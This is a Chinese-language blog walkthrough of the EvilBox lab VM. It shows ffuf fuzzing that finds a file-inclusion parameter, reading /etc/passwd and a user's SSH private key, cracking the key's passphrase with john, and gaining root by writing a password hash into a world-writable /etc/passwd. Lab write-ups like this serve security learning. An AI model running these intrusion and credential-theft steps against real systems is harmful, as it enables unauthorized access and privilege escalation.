扫描打点

dirsearch扫出来robots.txt和secretrobots.txt中拿到用户名H4x0rsecret是空的,dirsearch扫不到,fuzz一下1
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.56.113/secret/FUZZ.php
得到一个
evil
但还是空的,考虑传参进去
1
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.56.113/secret/evil.php?FUZZ=/etc/passwd
结果返回的都是
200但基本都是空,用-fs 0筛一下拿到参数
command,有文件包含,顺便看到用户为root和mowree
getshell试着访问该用户的
.bash_history但并没有php命令执行也不行:
那就只能回到
ssh了,试着读私钥文件:首先要确定一下是否支持用私钥文件登录:
1
ssh mowree@192.168.56.113 -v
看到支持公钥身份认证

那就去偷私钥:
/home/mowree/.ssh/id_rsa,注意该文件权限应改成600发现私钥文件被加密了:

先用
ssh2john提取hash值,再拿john爆破:1
2ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
爆出来密码
unicornlinux提权由于刚刚
/etc/passwd没找到别的用户,那么就应该没有横向,直接提权了

内核没有,sudo没有,
SUID没什么东西,ps aux也没什么值得注意的东西然后我对着之前的linux提权一个个看,发现
/etc/passwd可写:
用
openssl passwd -1生成密码的md5,扔到/etc/passwd的root里面
然后切换过去就行
学长的任务罢了11-evilbox
- 本文链接: http://noone40404.github.io/2025/01/15/学长的任务罢了11:evilbox/
 - 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!